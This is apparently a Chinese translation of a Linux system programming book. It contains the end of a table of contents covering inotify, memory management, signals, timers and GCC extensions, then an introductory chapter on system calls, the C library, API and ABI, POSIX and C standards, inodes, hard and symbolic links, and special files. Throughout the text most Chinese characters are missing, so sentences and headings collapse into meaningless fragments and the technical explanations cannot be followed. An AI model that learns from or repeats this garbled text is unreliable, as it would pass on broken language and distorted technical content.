7.1.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213
7.1.4 扩展属性. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215
7.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 223
7.2.1 工作. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224
7.2.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229
7.2.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 230
7.2.4 读内. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231
7.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235
7.3.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236
7.3.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 237
7.3.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 239
7.4 文件 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 240
7.4.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 240
7.4.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
7.5 设备. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242
7.5.1 设备. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
7.5.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
7.6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 244
7.7 文件件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 246
7.7.1 inotify . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247
7.7.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247
– X –
7.7.3 inotify 件. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 249
7.7.4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 252
7.7.5 inotify . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253
7.7.6 件小 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 254
7.7.7 inotify 实 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
第 8 章 内存管理 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
8.1 进程空间. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
8.1.1 页页调. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
8.1.2 存 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 257
8.2 内存. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
8.2.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260
8.2.2 调内存小 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 262
8.2.3 内存的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 264
8.2.4 对. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 266
8.3 段的理. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 270
8.4 存映射 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 271
8.4.1 存映射 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 272
8.4.2 映射 /dev/zero. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
8.5 存 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
8.5.1 malloc usable size() malloc trim() 进调 . . . . . . . . . . . . . . . . . 277
8.6 调内存. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278
8.6.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278
8.7 的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 280
8.7.1 的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
8.7.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283
8.8 的内存 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 284
8.9 存操作 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286
8.9.1 设. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 286
8.9.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 287
8.9.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 288
8.9.4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 289
8.9.5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
8.10内存. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
8.10.1 空间 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
8.10.2 空间 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 292
8.10.3 内存. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 293
8.10.4 的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294
8.10.5 页理内存 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 294
8.11性存 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295
8.11.1 超内存 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295
– XI –
第 9 章 信号 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 297
9.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 297
9.1.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
9.1.2 Linux 的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
9.2 理. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 304
9.2.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 305
9.2.2 子. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 306
9.2.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309
9.2.4 映射 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310
9.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 311
9.3.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 311
9.3.2 子. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 312
9.3.3 给自 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 312
9.3.4 给进程 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
9.4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
9.4.1 的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
9.5 集 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316
9.5.1 更的集 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316
9.6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 317
9.6.1 处理 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 318
9.6.2 集 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 318
9.7 理. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 319
9.7.1 siginfo t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
9.7.2 si code 的世. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 323
9.8 的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325
9.8.1 子. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 326
9.9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 326
第 10 章 时间. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 328
10.1时间的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 330
10.1.1 原示. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 330
10.1.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
10.1.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
10.1.4 时间 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 332
10.1.5 进程时间 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 333
10.2POSIX 时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 333
10.3时间 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 334
10.4时间. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 335
10.4.1 更的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 336
10.4.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 337
10.4.3 进程时间. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338
– XII –
10.5设时间. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 339
10.5.1 时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340
10.5.2 设时间的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340
10.6时间. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 341
10.7调校时. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
10.8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346
10.8.1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 347
10.8.2 Linux 的实时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 347
10.8.3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 348
10.8.4 实的方 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 350
10.8.5 sleep 的实 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 353
10.8.6 超. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 353
10.8.7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354
10.9时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354
10.9.1 单的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 354
10.9.2 间时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 355
10.9.3 时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 358
10.9.4 设时 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
附录 A GCC 对 C 语言的扩展 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365
A.1 GNU C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365
A.2 内. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365
A.3 内. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 366
A.4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 367
A.5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 368
A.6 的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 368
A.7 内存的 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 368
A.8 调 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 369
A.9 将 deprecated . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 369
A.10将 used. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370
A.11将或 unused. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370
A.12将进(pack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370
A.13的内存对 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
A.14将存 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
A.15. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
A.16式的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 373
A.17的内存对. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 374
A.18的. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 375
A.19. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 375
A.20 Case . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 376
A.21void 的操作 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377
A.22更更的性 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377
– XIII –
附录 B
参考书目 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380
B.1 C 程设的相 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380
B.2 Linux 程的相. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 381
B.3 Linux 内的相. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 381
B.4 操作设的相 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 382
– XIV –
1
第 1 章
简介和主要概念
的程的将写
件的相。件的内
进。的件 shell、文、、调、工
(: 即 GNU Core Utilities, GNU 的工集我
们的) 进程。程内 C 以
” ” 件。件( (high-level)GUI 程
更的们。程
的时间写件。理程
程。作的更
的程我们写的件的。
的 Linux 上的程的。 Linux Linus Torvalds
内散的写的 Unix 操作。 Linux Unix
同的理 Linux Unix Linux 自的原方方
的实能的。的 Linux 程的内
何的 Unix 的。然内 Linux 相
的 Unix 自出的 Linux 的新的调
同的新性。
1.1 系统编程
的的 Unix 程程。
上 Unix 的 X Window 上进工作
时我们的 Unix API。以上
Linux 程设的。然程的 – 何
make 的 Linux 上的程的 API。
们程程相们同同。
程出的程对工作的的件操作
的然们调上的。写的
的上上相的内。的
– 1 –
1
程程程 (或相), 件的。
离的程的然的
的方式的程同。
我们 web 件( Javascript
PHP( C# 或 Java程离程
更的展。然展示程的。实
上写 Javascript C#
程。更进步 PHP Java 程然以程同
理内的能何写出更的。
程的展的 Unix Linux 的程然
程 C C 内提的。的
程 Apache、 bash、 cp、 Emacs、 init、 gcc、 gdb、 glibc、 ls、 mv、 vim
X时的。
程的内或设备的内
。程的将内。将
内上的内(内对空间
程。同程以及相的内展
。设备程程的
。
我 Linux 上写程内
C 提我何 Linux 设小相
Unix Linux 提的调们何工作的
将的。
程调 C C 的
。
1.1.1 系统调用
程调。调(写 syscalls操作
或空间文内
(的的调。调我们的 read()
write() 的 get thread area() set tid address()。
Linux 实的调操作。 i386
– 2 –
1
的调 300 相的 Windows 上。
Linux 的内( Alpha i386 PowerPC) 实自的
调。同间的调存的。然 90% 以
上调的上实。上的的
内。
1.1.2 调用系统调用
空间程能内。的
空间程内的或操作内。相内提
空间程能内调调
。程能内内
的。同的相同 i386 上空间程
0x80 的 int将内
的内处理的 0x80 的处理
的调处理。
程存内调。
调 0 。 i386 上调 5(
open()空间程 int 将 5 写 eax 存。
的方式进处理。以 i386 存
能的存 ebx、 ecx、 edx、 esi edi 存 5 。对
的超 5 的调的存空间存
的存即。然调的。
处理调的方式同的的。作
程内处理调的。内
的调的 C 自处理。
1.1.3 C 库
C (libc Unix 程的。的 C
的的提或方的
调。的 Linux C GNU libc 提 glibc
[gee-lib-see] 或更 [glib-see].
GNU C 提超展示的内。的 C glibc 提
– 3 –
1
调程工。
1.1.4 C 编译器
Linux 的 C GNU 工集(gcc。原 gcc
GNU 的 cc C 。 GCC 示 GNU C Compiler。
的进。时 gcc GNU 的。然
gcc 调 C 我 gcc 的时
上文的 gcc 程。
实 C (”C ”) 的 ABI(”APIs
ABIs” ) Unix ( Linux ) 的程的
。
1.2 API 和 ABI
将程们们写的程以提
的上。们们自的 Linux 上的程能
的 Linux 同时以 Linux 的更新的
Linux 上。
性的相的集
程(API程进(ABI
件同间的。
1.2.1 API
API 件间的。提
(以的方式) 的方式进: 程段(的
以调程段(。
上示文的 API 能对示文提
的。 API 我们的API实对 API 的实。
们 API 理的
上 API 。 API 的 (件) 给 API 的
实提何实内能的子或
或。 API 的件同的 API
时。 API API 的实上能。
– 4 –
1
实的子 API C C 实 API
的处理。
我们及 API的 IO。 Linux
程的 API 将的。
1.2.2 ABI
API ABI 的的上或
件间的进。何自何内
以及进。 ABI 进段能
何同 ABI 的上作新。
ABI 的调、、存、调、
、进式。以调何调
何存以及调何提的
。
同的操作( i386 上的 Unix 操作
的 ABI然效。相 Linux
内的操作自的 ABI ABI 相。
的 ABI 及的的存或。 Linux
自的 ABI 集实上我们以的
ABI alpha x86-64 。
程 ABI 的。 ABI
上的工(tooltrain、。
ABI 的相内以写出更的写或
工时的绝(实程。
我们以上 Linux 上的工内实的 ABI
。
1.3 标准
Unix 程的 Unix 程。
Unix 的。性。
的世将方。
– 5 –
1
的上 Linux 们。 Linux
的 POSIX Single Unix Specification(SUS)
内 POSIX SUS Unix 操作上的 C API
们效的的 Unix 程出
的 API 集。
1.3.1 POSIX 和 SUS 的历史
1980 子工程(IEEE Unix 的
的相工作。自件(Free Software Movement的
Richard Stallman POSIX ( pahz-icks
Portable Operating System Interface(操作。
1988 IEEE std 1003.1-1988(
POSIX1988 。 1990 IEEE POSIX IEEE std 1003.1-
1990(POSIX1990。性的实时程 IEEE Std 1003.1b-1993
(POSIX 1993 or POSIX.1b) IEEE Std 1003.1c-1995(POSIX 1995 or POSIX.1c) 式
文。 2001 性 POSIX1990 的上单的
IEEE Std 1003.1-2001 (POSIX 2001)。新的 IEEE Std 1003.1-2004 布
2004 4 的 POSIX POSIX.1以 2004 新
。
1980 1990 Unix 的”Unix ”
处的将自的 Unix ”Unix”。的
Unix Open Software Foundation(OSF X/Open 工业
-The Open Group。 The Open Group 提、。 1990
Unix 的时 The Open Group 布单 UNIX
(Single UNIX Specification SUS。相的 POSIX SUS
的。 SUS 新的 POSIX 。
的 SUS 布 1994 SUSv1 的 Unix 95.
的 SUS 布 1997 相的 UNIX 98. 的
SUS新的 SUS,SUSv3 布 2002 的 Unix 03.SUSv3
IEEE Std 1003.1-2001 。我将
POSIX 的调提及。我将提及 POSIX SUS
( SUS POSIX.1 的超集
– 6 –
1
的扩展的 POSIX.1 提的能 –APUE S2.2.3。
1.3.2 C 语言标准
Dennis Ritchie Brian Kernighan 的作C 程设 (Prentice
Hall) 自 1978 出式的 C 的。
的 C K&R C。 C 的 Basic 程的
。对时相的进
(ANSI 1983 方的 C
进新的性同时 C++ 的。
程 ANSI C 1989 。 1990
(ISO ANSI C 进 ISO C90。
1995 ISO 布新(然 ISO
C95。 1999 的 ISO C99 更新的内进新的
inline 、新、、 C++ 新的。
1.3.3 Linux 和标准
Linux POSIX 以及 SUS 提 SUSv3 POSIX.1
的的实时(POSIX.1b) 程 (POSIX.1c) 。更的
Linux 提 POSIX SUS 的。满
的即 bug。 Linux POSIX.1 SUSv3 实的
POSIX 或 SUS 方( Linux 的以我式
布 Linux POSIX 或 SUS 的。
Linux gcc C ISO C99 gcc 提
C 的扩展扩展 GNU C。相。
Linux 的的子。 C
的将的。进
以的 glibc 。 gcc 扩展对新的 gcc
布 C gcc 将的的 C
程。的 Linux 内调的调 Linux 内
的上实。
同的 Linux 布 Linux (LSB。
LSB Linux (自 [Free Standard Group])
– 7 –
1
的。 LSB 扩展 POSIX SUS自的。
提进即的上。
Linux 程上 LSB 。
1.3.4 本书和标准
何的空。时 Unix 程
对同的的进给的调
上实进。及新的 2.6 内
、 gcc 4.2 C (2.5的 Linux 上的进程的相。
的 (Linux 内小处理以
调) 同时提程上进的性
方式我们 Linux 的时 Unix 的
性。将的 Linux 上以的
将的 Linux 。 Linux 的相
gcc内的实。我们以业的实能
。
1.4 Linux 编程概念
展 Linux 提的的。的 Unix
Linux 提同的集。实上
同 Unix。对文件进程的、理的
Unix 的内。
Linux 以 shell
单的 C 程。 Linux 的 Linux 程的内
进 Linux 程的的。
1.4.1 文件和文件系统
文件 Linux 的。 Linux 文件的理(
然 Plan9。的工作
读写文件的的文件。
文件能。文件以以读方式或写方式或
。的文件的文件进
– 8 –
1
文件的的映射。 Linux 内文件
示(C 的 int写 fd。文件
空间程文件文件。的 Linux
程对文件的操作。
1.4.2 普通文件
我们的文件 Linux 的文件。文件以
性方式的。 Linux 文件更进
步的或式。以何以以何方式
文件 Linux 文件的。
操作 VMS提的文件的。 Linux
的处理。
文件的何以读或写操作的
文件的的。文件或文件。
文件内的文件的的。文
件时 0。对文件的读写操作 (进)文件的
。文件的以工超
文件的。超文件写将间的 0。
以的方式文件的写文件的
写。上实上处。文件
0能。文件间写将上的。
间写内扩展文件的文件写操作文件的
文件的存的 C 的小新的
的 Linux 上 64 。
文件的小文件。文件文件的
性的。文件的以(truncation。
文件以文件小的文件。的
操作文件以原更的文件。文
件以0进(文件的。文件以空( 0
何。文件同文件的 Linux 内理
文件的 C 的小。然的文件能自的
将更小的。
– 9 –
1
同文件能同或相同的进程文件的
实提的文件。进程能文件同
进程。内对文件何同的进程能
同时对同文件进读写。的操作的
的。空间程调们自的以文件
以同步。
文件文件进实上对文件文件
。相文件 inode( inode 的进
。 inode (inode number)写 i-number 或 ino。
inode 存文件的的时间、、、以及文
件的的 – 文件。 inode Unix 文件上实
理对 Linux 内的的实。
1.4.3 目录和链接
inode 文件然的(的
。们文件文件。提文件
时的的将读的 inode 进映射。 inode 的
对(link。映射理上的式以单的、
或何式映射内对的文件实
理。上以何的文件的同
存 inode 的映射。内映射将文件 inode。
空间的文件时内文件的
然文件。内文件 inode 然 inode
对的 inode。 inode 文件相的文件
上的存。
上 /。我们的
上。内给的文件
同文件相实上们的
inode。内的能的的 inode。以
的。 Unix 的
文件 /home/blackbeard/landscaping.txt.
内的时上的(directory
– 10 –
1
entry内 dentry的 inode。的子内
/ home 的 inode然 blackbeard 的 inode进
landscaping.txt 的 inode。操作程或。内
存( dentry cache存的提时间性
。时间性我们将。
的(fully qualified的绝对
。的相们相对(
todo/plunder)。相对。相对时内的工作
进。工作内 todo
内 plunder 的 inode。
然以的文件内操作文件
操作们。相们的调操作们
调进操作。
空间内的理进操作单的能
文件。
1.4.4 硬链接
上何内及同
inode 上。实上以的。我们将同映射同 indoe
的。
的文件相同的。
以同以同的内
以将的上。 /home/bluebeard/map.txt
/home/blackbeard/treasure.txt 以的 inode 上。
的文件将 unlink 操作操作将文件
inode 的映射。然 Linux 文件能
unlink 操作 inode 以及的。文件的
方存? 文件的
文件 inode (link count) 文件
文件的。将 1。 0 的时
inode 的真的文件。
– 11 –
1
1.4.5 符号链接
inode 自文件何以能文件
。文件 Unix 实(
symlinks。
上文件 symlink 自的 inode
文件的。以何方同文
件上的文件存的文件。存文件的
。
相更。效的
文件的文件。的
或进文件的文件何。的
的然的。
相的性。的实
操作出文件。操作
的调。作文件的方式文件内
时性的的。
1.4.6 特殊文件
文件以文件方式示的内对。以 Unix
同的文件 Linux 的文件设备文件、设备文
件、 Unix 。文件将文件的方
文件理的实。 Linux 提文件的调。
对 Unix 的设备进设备文件实设备文件的
文件的文件。设备文件以、读写以
空间程操作上的(理的设备。 Unix 的设备
设备设备。设备自的设备文件。
设备同性。设备程将写
空间程写的进读。的
设备。”peg”程将设备读 p然 e
